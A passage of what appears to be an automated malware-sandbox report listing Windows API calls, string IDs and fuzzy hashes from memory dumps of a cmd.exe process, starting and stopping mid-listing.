                                                                                                                                              • Part of subcall function 00249A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0024793A,00000104,?), ref: 00249A2B
                                                                                                                                              • Part of subcall function 00249A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00249A47
                                                                                                                                              • Part of subcall function 00249A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374), ref: 00249A56
                                                                                                                                              • Part of subcall function 00249A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374), ref: 00249A61
                                                                                                                                              • Part of subcall function 00249A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04,?,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00249A6A
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00247943
                                                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00247908,00002374,-00000001), ref: 00247951
                                                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00280AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 002479BE
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00247A1C
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00247A27
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2173784998-0
                                                                                                                                            • Opcode ID: 6a89dcff3218bcf1d182a058d92e9fd82ac3db65623502aca9a66db5992d4fce
                                                                                                                                            • Instruction ID: 9e2e1028e1d8a01b46b259229767b77c403597b30e3455e2d2d385bbfe81d7e5
                                                                                                                                            • Opcode Fuzzy Hash: 6a89dcff3218bcf1d182a058d92e9fd82ac3db65623502aca9a66db5992d4fce
                                                                                                                                            • Instruction Fuzzy Hash: 5371C175D11219EFDB18DFA4EC89ABEBBB9FF44302F14402AF906E2250DB749854CB51
                                                                                                                                            Function 00262859 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 165windowthreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00262931
                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00262998
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentFormatMessageThread
                                                                                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P3$$ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                            • API String ID: 2411632146-2650050279
                                                                                                                                            • Opcode ID: 4d29c8307e1db8d2ba0ef8ddc6d743b903b81ffb9262362cd9b6311461307eb4
                                                                                                                                            • Instruction ID: 785a9dbe6de88016f144c006b85b354db8a4fd6e3cc60dc3da04e805e0ee8ea3
                                                                                                                                            • Opcode Fuzzy Hash: 4d29c8307e1db8d2ba0ef8ddc6d743b903b81ffb9262362cd9b6311461307eb4
                                                                                                                                            • Instruction Fuzzy Hash: 47517471520B00EBDB349F688C09E67BBB8EF45B00F10445CF546A2162DAB2DAF8CF61
                                                                                                                                            Function 002500E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0025011A
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00250156
                                                                                                                                              • Part of subcall function 0024EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0026E590,00002000,?,00288BF0,00000000,?,?,00248F0D), ref: 0024EC51
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024EC77
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024EC8D
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECA3
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECB9
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECCF
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECE5
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECF7
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ED0D
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 002501DB
                                                                                                                                            • exit.MSVCRT ref: 0025E621
                                                                                                                                            • _wcsupr.MSVCRT ref: 0025E683
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0025E71A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                            • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                            • API String ID: 2336066422-4197029667
                                                                                                                                            • Opcode ID: 9966c913933ba07ead4751e5a19db6fd5451a2c7b0053c62c538f218dde14b1e
                                                                                                                                            • Instruction ID: 6f5c739fc34bf6613c2fbbab997b65bd1ae0c45e79785184a859a236ac7969c4
                                                                                                                                            • Opcode Fuzzy Hash: 9966c913933ba07ead4751e5a19db6fd5451a2c7b0053c62c538f218dde14b1e
                                                                                                                                            • Instruction Fuzzy Hash: 90513834B302168BDF1CDF61CC956BE7329EF60345F054469EC06A7180EF709E698B9A
                                                                                                                                            Function 0024E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                            • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                            • API String ID: 1913572127-843887632
                                                                                                                                            • Opcode ID: 0522078d686bdada0d15421e6b8319c959460752a82c795f38da1a2dedba0850
                                                                                                                                            • Instruction ID: 156797661c5e16b09b2df81be1d4c71dc696a01f5bf164a40e9d68128bc4fe33
                                                                                                                                            • Opcode Fuzzy Hash: 0522078d686bdada0d15421e6b8319c959460752a82c795f38da1a2dedba0850
                                                                                                                                            • Instruction Fuzzy Hash: C7A10631A352269BEF38CF68D888BB977B0FF44314F160199E806A7291D7B09DA5CB51
                                                                                                                                            Function 00253065 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 152COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                            • String ID: +-~!$/%$/%
                                                                                                                                            • API String ID: 2191331888-2839661920
                                                                                                                                            • Opcode ID: 59c8d4086dac9a807fadb12f746fa5fd629a57e125073e4e30e386dd8b059e78
                                                                                                                                            • Instruction ID: 1e51586a3313cd66e85d1b43e5f4b7b75c8ef5a54614f3ef8c97c3435e400f50
                                                                                                                                            • Opcode Fuzzy Hash: 59c8d4086dac9a807fadb12f746fa5fd629a57e125073e4e30e386dd8b059e78
                                                                                                                                            • Instruction Fuzzy Hash: 4851A17142060ADBCB04DF24E9499EA37A9EF05362B10C026FC169B150EBB4DF28DB65
                                                                                                                                            Function 0024BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcschr$iswspace
                                                                                                                                            • String ID: =,;
                                                                                                                                            • API String ID: 3458554142-1539845467
                                                                                                                                            • Opcode ID: 60c12897166f3530f6b64c91cfa730de2be0fb4faa5822544aa4e2989c821afe
                                                                                                                                            • Instruction ID: 0f30b1b9b7bfd13eb568fec37f2cbb3d94215c22c56307e34aa7e579daa659f5
                                                                                                                                            • Opcode Fuzzy Hash: 60c12897166f3530f6b64c91cfa730de2be0fb4faa5822544aa4e2989c821afe
                                                                                                                                            • Instruction Fuzzy Hash: 9F81E074A20216CBDF399F64CC453BA73B5AF54305F1448ABED4AA7240EB74CDA8CB61
                                                                                                                                            Function 03C12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 065fcb9e9535a74f066e8058601d916f00b0b1568b66f88d574d7ec3503413b8
                                                                                                                                            • Instruction ID: 6a93ab08608927ded336c88acd6b90c937144b377da91b11c23558c35fce1fff
                                                                                                                                            • Opcode Fuzzy Hash: 065fcb9e9535a74f066e8058601d916f00b0b1568b66f88d574d7ec3503413b8
                                                                                                                                            • Instruction Fuzzy Hash: 80512DBAA00556BFDB20DF5C898097EFBB8FB09200B14856AE465DB641D374DF10E7E0
                                                                                                                                            Function 03C82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 9c1567a4764c12e8765ecf44f39cd799da27867b9a77dc8339529155c0a3dc3a
                                                                                                                                            • Instruction ID: 0a62bf4eeffea6b293c041854a7943f759523a70bf9fe4541b457940cb12ab34
                                                                                                                                            • Opcode Fuzzy Hash: 9c1567a4764c12e8765ecf44f39cd799da27867b9a77dc8339529155c0a3dc3a
                                                                                                                                            • Instruction Fuzzy Hash: 6E5106B9A40655AECB30FF5CC89487FF7F9EF44208B4488AAE496DB641D774DB008760
                                                                                                                                            Function 00256903 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 105sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0026CA98,0000000C), ref: 00256940
                                                                                                                                            • _amsg_exit.MSVCRT ref: 00256955
                                                                                                                                            • _initterm.MSVCRT ref: 002569A9
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 002569D5
                                                                                                                                            • exit.MSVCRT ref: 00256A1C
                                                                                                                                            • _XcptFilter.MSVCRT ref: 00256A2E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                            • String ID: $&$$&
                                                                                                                                            • API String ID: 796493780-2255267958
                                                                                                                                            • Opcode ID: c83906d549d95be67b003fb706461e3268243797eb39ca4c25b71f433f0e31f9
                                                                                                                                            • Instruction ID: a2bc70fd1479fe42762832f7637b6e993ac88c5996657078b57ccde9e92496a2
                                                                                                                                            • Opcode Fuzzy Hash: c83906d549d95be67b003fb706461e3268243797eb39ca4c25b71f433f0e31f9
                                                                                                                                            • Instruction Fuzzy Hash: 14314639564302CFEF259F54FC8D72937A0EB05722FA1402AE806972E0EFB05CA4CB59
                                                                                                                                            Function 00262D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00263877), ref: 00262D31
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectSingleWait
                                                                                                                                            • String ID: wil
                                                                                                                                            • API String ID: 24740636-1589926490
                                                                                                                                            • Opcode ID: cefdd252020fa512dca46644d450e738936cb45b514d1719d7860715b098b2e9
                                                                                                                                            • Instruction ID: 9fb3cc0763bf5bc5bb5cf6de13f3e29fab7b4a67660893845a37edc8d7cc5225
                                                                                                                                            • Opcode Fuzzy Hash: cefdd252020fa512dca46644d450e738936cb45b514d1719d7860715b098b2e9
                                                                                                                                            • Instruction Fuzzy Hash: 63318134235A06EBFB249E60DC48BAB366DEF41350F604036F802C6184DBB9DDB99752
                                                                                                                                            Function 0024C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0027A7F0,00000000,?,00000200), ref: 0024C818
                                                                                                                                            • wcschr.MSVCRT ref: 0024C882
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 0024C8BA
                                                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024C8C4
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 0024C8DB
                                                                                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024C8ED
                                                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0024C90D
                                                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 0024C91E
                                                                                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0027A7F0,00000200,00000000,00000000), ref: 0024C934
                                                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 0024C941
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 0024CAC4
                                                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024CACE
                                                                                                                                            • memcmp.MSVCRT(0027A7F0,002434F8,00000003), ref: 0025D16E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1383533039-0
                                                                                                                                            • Opcode ID: 271a1bf8ec787b1b3a983d69e4ad39eca7aeb132b65c225af2fb3a01ede12090
                                                                                                                                            • Instruction ID: 9fa67049df5f612b99aef78115f9adf770739f03ef9f5ac15fcfdb403a06ffd0
                                                                                                                                            • Opcode Fuzzy Hash: 271a1bf8ec787b1b3a983d69e4ad39eca7aeb132b65c225af2fb3a01ede12090
                                                                                                                                            • Instruction Fuzzy Hash: C1414C709223155BEF388F289C8DBA97676BB44301F680059F50DD7180DB764DA5CF5A
                                                                                                                                            Function 00250444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                            • API String ID: 2081463915-1668778490
                                                                                                                                            • Opcode ID: 40d48a73d2042e512fc200c17e24d99b2034d7cc4dfc59dac73e38e75b903e36
                                                                                                                                            • Instruction ID: 05e87cac8e1ae2616fe8a5f7423ad6c352a86f4b1cb3f9c2ee215b64d0e1009a
                                                                                                                                            • Opcode Fuzzy Hash: 40d48a73d2042e512fc200c17e24d99b2034d7cc4dfc59dac73e38e75b903e36
                                                                                                                                            • Instruction Fuzzy Hash: 3421DB712367039AFB2C1F25AC9A73A66D8EB45356F64441FF841811C1FEB4C8648B1A
                                                                                                                                            Function 03C07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • ExecuteOptions, xrefs: 03C446A0
                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03C44742
                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03C44725
                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03C44787
                                                                                                                                            • Execute=1, xrefs: 03C44713
                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03C44655
                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03C446FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                            • Opcode ID: a0e0d7795b5e69069903ad028ac83c3944061ebfa4a81be27a69d4cce18cc296
                                                                                                                                            • Instruction ID: 67a904a9fdb063bf4d23408c79d49eebf92c5c2adb459c985c4dcc3561622c24
                                                                                                                                            • Opcode Fuzzy Hash: a0e0d7795b5e69069903ad028ac83c3944061ebfa4a81be27a69d4cce18cc296
                                                                                                                                            • Instruction Fuzzy Hash: BD512835A00359AADF19EBA9DC95BBD73B8AB04304F1400E9E506EF1D1DB70AE41DF50
                                                                                                                                            Function 002664DB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 0026650F
                                                                                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00), ref: 00266545
                                                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 00266553
                                                                                                                                            • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 00266590
                                                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665AD
                                                                                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,002420B8,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665D4
                                                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseDeleteValue$CreateOpen
